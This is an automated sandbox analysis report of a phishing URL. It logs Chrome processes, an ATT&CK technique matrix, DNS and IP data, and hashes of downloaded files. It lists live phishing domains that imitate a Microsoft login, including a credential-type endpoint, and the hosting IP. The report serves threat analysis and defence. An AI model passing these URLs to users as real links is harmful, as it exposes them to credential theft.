            Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cd"
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=3340,i,1354710186197194451,1516178957246450856,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3440 /prefetch:3Jump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure1
            Drive-by Compromise
            Windows Management Instrumentation1
            Browser Extensions
            1
            Process Injection
            1
            Masquerading
            OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Process Injection
            LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
            File Deletion
            Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
            Ingress Tool Transfer
            Traffic DuplicationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cd0%Avira URL Cloudsafe
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://h89s9dhj.ccbequipamentos.com.br/favicon.ico0%Avira URL Cloudsafe
            https://hapiinenstys.criadordeconexoes.com.br/100%Avira URL Cloudphishing
            https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly93d3cub2ZmaWNlLmNvbS9sb2dpbiM=100%Avira URL Cloudphishing
            https://hapiinenstys.criadordeconexoes.com.br/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2hhcGlpbmVuc3R5cy5jcmlhZG9yZGVjb25leG9lcy5jb20uYnIvIiwiZG9tYWluIjoiaGFwaWluZW5zdHlzLmNyaWFkb3JkZWNvbmV4b2VzLmNvbS5iciIsImtleSI6InFWUDg3RWFGR0NRbiIsInFyYyI6bnVsbCwiaWF0IjoxNzQyMjI5NzYyLCJleHAiOjE3NDIyMjk4ODJ9.bpFU2t6kMODAzyr1sHzSD1xCGWuz2a7omLxO3ziToVg100%Avira URL Cloudphishing
            https://hapiinenstys.criadordeconexoes.com.br/favicon.ico100%Avira URL Cloudphishing
            https://hapiinenstys.criadordeconexoes.com.br/common/GetCredentialType?mkt=en-US100%Avira URL Cloudphishing
            NameIPActiveMaliciousAntivirus DetectionReputation
            hapiinenstys.criadordeconexoes.com.br
            23.95.206.231
            truetrue
              unknown
              e329293.dscd.akamaiedge.net
              92.123.12.139
              truefalse
                high
                challenges.cloudflare.com
                104.18.94.41
                truefalse
                  high
                  www.google.com
                  142.250.185.132
                  truefalse
                    high
                    h89s9dhj.ccbequipamentos.com.br
                    23.95.206.231
                    truefalse
                      high
                      s-part-0032.t-0009.t-msedge.net
                      13.107.246.60
                      truefalse
                        high
                        aadcdn.msftauth.net
                        unknown
                        unknownfalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cdfalse
                            unknown
                            https://hapiinenstys.criadordeconexoes.com.br/favicon.icofalse
                            • Avira URL Cloud: phishing
                            unknown
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/921df19f1aa9330c/1742229751867/S9e8vOBS_eqZ502false
                              high
                              https://hapiinenstys.criadordeconexoes.com.br/?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL2hhcGlpbmVuc3R5cy5jcmlhZG9yZGVjb25leG9lcy5jb20uYnIvIiwiZG9tYWluIjoiaGFwaWluZW5zdHlzLmNyaWFkb3JkZWNvbmV4b2VzLmNvbS5iciIsImtleSI6InFWUDg3RWFGR0NRbiIsInFyYyI6bnVsbCwiaWF0IjoxNzQyMjI5NzYyLCJleHAiOjE3NDIyMjk4ODJ9.bpFU2t6kMODAzyr1sHzSD1xCGWuz2a7omLxO3ziToVgfalse
                              • Avira URL Cloud: phishing
                              unknown
                              https://hapiinenstys.criadordeconexoes.com.br/common/GetCredentialType?mkt=en-USfalse
                              • Avira URL Cloud: phishing
                              unknown
                              https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                high
                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=921df19f1aa9330c&lang=autofalse
                                    high
                                    https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=cebc15b3c86fa69be7285330a66657219c1287ff53c1f7059daa44d10ef1952d669e891ae8484a544c8d16f0be8cc4af98aec84015acb9fd06d2a3ccc941854cfalse
                                      unknown
                                      https://hapiinenstys.criadordeconexoes.com.br/false
                                      • Avira URL Cloud: phishing
                                      unknown
                                      https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallbackfalse
                                        high
                                        https://h89s9dhj.ccbequipamentos.com.br/favicon.icofalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://hapiinenstys.criadordeconexoes.com.br/?piwg10otu=aHR0cHM6Ly93d3cub2ZmaWNlLmNvbS9sb2dpbiM=false
                                        • Avira URL Cloud: phishing
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/va3bb/0x4AAAAAABAbx3VGqcPC-OGo/auto/fbE/new/normal/auto/false
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/921df19f1aa9330c/1742229751868/0df0701f524323cd1dd6ed6b0a6c711cea6cb7d910bb71d6d33d24befe49df70/2Si4XeZsCj928_7false
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://login.microsoftonline.comchromecache_65.2.drfalse
                                              high
                                              http://www.opensource.org/licenses/mit-license.php)chromecache_76.2.drfalse
                                                high
                                                http://knockoutjs.com/chromecache_76.2.drfalse
                                                  high
                                                  https://login.windows-ppe.netchromecache_65.2.drfalse
                                                    high
                                                    https://js.monitor.azure.com/scripts/c/ms.analytics-web-2.min.jschromecache_76.2.drfalse
                                                      high
                                                      http://www.json.org/json2.jschromecache_76.2.drfalse
                                                        high
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        23.95.206.231
                                                        hapiinenstys.criadordeconexoes.com.brUnited States
                                                        36352AS-COLOCROSSINGUStrue
                                                        104.18.94.41
                                                        challenges.cloudflare.comUnited States
                                                        13335CLOUDFLARENETUSfalse
                                                        142.250.185.132
                                                        www.google.comUnited States
                                                        15169GOOGLEUSfalse
                                                        IP
                                                        192.168.2.4
                                                        Joe Sandbox version:42.0.0 Malachite
                                                        Analysis ID:1640767
                                                        Start date and time:2025-03-17 17:41:24 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 3m 18s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:browseurl.jbs
                                                        Sample URL:https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cd
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:20
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal68.phis.win@25/37@16/4
                                                        EGA Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 100%
                                                        • Number of executed functions: 0
                                                        • Number of non-executed functions: 0
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, RuntimeBroker.exe, ShellExperienceHost.exe, SIHClient.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.186.78, 172.217.16.206, 173.194.76.84, 216.58.206.46, 142.250.184.238, 216.58.206.78, 142.250.185.238, 2.23.77.188, 172.217.18.14, 142.250.184.206, 20.190.160.64, 20.190.160.2, 20.190.160.67, 40.126.32.140, 40.126.32.74, 20.190.160.17, 20.190.160.4, 20.190.160.20, 40.126.31.67, 20.190.159.131, 40.126.31.3, 20.190.159.71, 20.190.159.73, 20.190.159.2, 20.190.159.23, 40.126.31.69, 142.250.185.206, 216.58.206.42, 142.250.186.170, 142.250.181.234, 142.250.185.234, 142.250.185.106, 142.250.184.234, 142.250.184.202, 172.217.16.138, 142.250.186.74, 142.250.185.170, 142.250.186.42, 172.217.16.202, 142.250.186.106, 142.250.185.138, 142.250.185.202, 142.250.186.138, 51.105.71.137, 13.89.179.13, 216.58.206.35, 142.250.185.163, 23.60.203.209, 4.245.163.56, 13.107.246.60
                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, www.tm.lg.prod.aadmsa.akadns.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, onedscolprduks03.uksouth.cloudapp.azure.com, clients2.google.com, onedscolprdcus21.centralus.cloudapp.azure.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, update.googleapis.com, csp.microsoft.com, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.v4.a.prd.aadg.trafficmanager.net, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, aadcdnoriginwus2.afd.azureedge.net, clients.l.google.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: https://h89s9dhj.ccbequipamentos.com.br/?noiajvga=2bdd817baf4e46e28f740a82bff8e850881b2c9159d1f9f1d332e339e76eea813a3f5893897cb7539a84e2eac2026594b5d62df0bbf5820b252c5afd2b02c9cd
                                                        No simulations
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        No context
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                        Category:dropped
                                                        Size (bytes):621
                                                        Entropy (8bit):7.673946009263606
                                                        Encrypted:false
                                                        SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                        MD5:4761405717E938D7E7400BB15715DB1E
                                                        SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                        SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                        SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):61
                                                        Entropy (8bit):3.990210155325004
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1
                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:GIF image data, version 89a, 352 x 3
                                                        Category:dropped
                                                        Size (bytes):3620
                                                        Entropy (8bit):6.867828878374734
                                                        Encrypted:false
                                                        SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                        MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                        SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                        SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                        SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                        Category:downloaded
                                                        Size (bytes):673
                                                        Entropy (8bit):7.6596900876595075
                                                        Encrypted:false
                                                        SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                        MD5:0E176276362B94279A4492511BFCBD98
                                                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hapiinenstys.criadordeconexoes.com.br/aadcdn.msauth.net/~/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
                                                        Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:HTML document, ASCII text, with very long lines (3445), with CRLF line terminators
                                                        Category:downloaded
                                                        Size (bytes):3447
                                                        Entropy (8bit):5.1147634913081745
                                                        Encrypted:false
                                                        SSDEEP:96:3qO9I9Sz9cNHULI5m4n0imQBGLesqAsosushswsosry:a2IYz9c6qzmQBaC
                                                        MD5:ACDEC8DAD3164FBA20E86D50F1B979F1
                                                        SHA1:0C5FD1CCA5BECDB0080D20E6A90CCD91BC0D5894
                                                        SHA-256:1D2CDE2E778A731CBD158758F735E1BCC2508A8252720D261D94068AFF45AACC
                                                        SHA-512:A9D25D79EDF7BD8D668D5833263461B72B077AD3885A05DE749C7F0326BFC7C8D5D2D967E11FF40E52755211774DEC0E913532BC86AEEEC37B243A213CECEEC1
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://login.live.com/Me.htm?v=3
                                                        Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:ASCII text, with very long lines (48238)
                                                        Category:downloaded
                                                        Size (bytes):48239
                                                        Entropy (8bit):5.343270713163753
                                                        Encrypted:false
                                                        SSDEEP:768:+CbPzHMb42QOna0rhgaqC2DdONTjwzsLSh0ZsC3Y2zIijkKY1LBep7iFFQ7Srv3h:gb425na0rhgaqDnzs22z3kH
                                                        MD5:184E29DE57C67BC329C650F294847C16
                                                        SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                        SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                        SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                        Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:PNG image data, 9 x 40, 8-bit/color RGB, non-interlaced
                                                        Category:downloaded
                                                        Size (bytes):61
                                                        Entropy (8bit):4.035372245524404
                                                        Encrypted:false
                                                        SSDEEP:3:yionv//thPlOtxijikxl/k4E08up:6v/lhPxik7Tp
                                                        MD5:E27CBA59C9BFFD33F6CD6ACB21D4D5C0
                                                        SHA1:A15E5BC2CEA9929480BD645687ACA09732B16966
                                                        SHA-256:12A0C47CCD7CA1385035882D68EA88DFB55A0E71E053D92FEC9182408453D72D
                                                        SHA-512:44A51854666BE1D00491F78951E1C772CBD370AA912C577AC831B0498688943A8BEC32ED18DF78C99791535DCC572FDEA4A70AFDF40DD6E965B0CD9B1E80F00A
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/921df19f1aa9330c/1742229751867/S9e8vOBS_eqZ502
                                                        Preview:.PNG........IHDR.......(.......G.....IDAT.....$.....IEND.B`.
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                        Category:downloaded
                                                        Size (bytes):17174
                                                        Entropy (8bit):2.9129715116732746
                                                        Encrypted:false
                                                        SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                        MD5:12E3DAC858061D088023B2BD48E2FA96
                                                        SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                        SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                        SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                        Malicious:false
                                                        Reputation:low
                                                        URL:https://hapiinenstys.criadordeconexoes.com.br/aadcdn.msauth.net/~/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                        Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                        Category:dropped
                                                        Size (bytes):673
                                                        Entropy (8bit):7.6596900876595075
                                                        Encrypted:false
                                                        SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                        MD5:0E176276362B94279A4492511BFCBD98
                                                        SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                        SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                        SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                        Malicious:false
                                                        Reputation:low
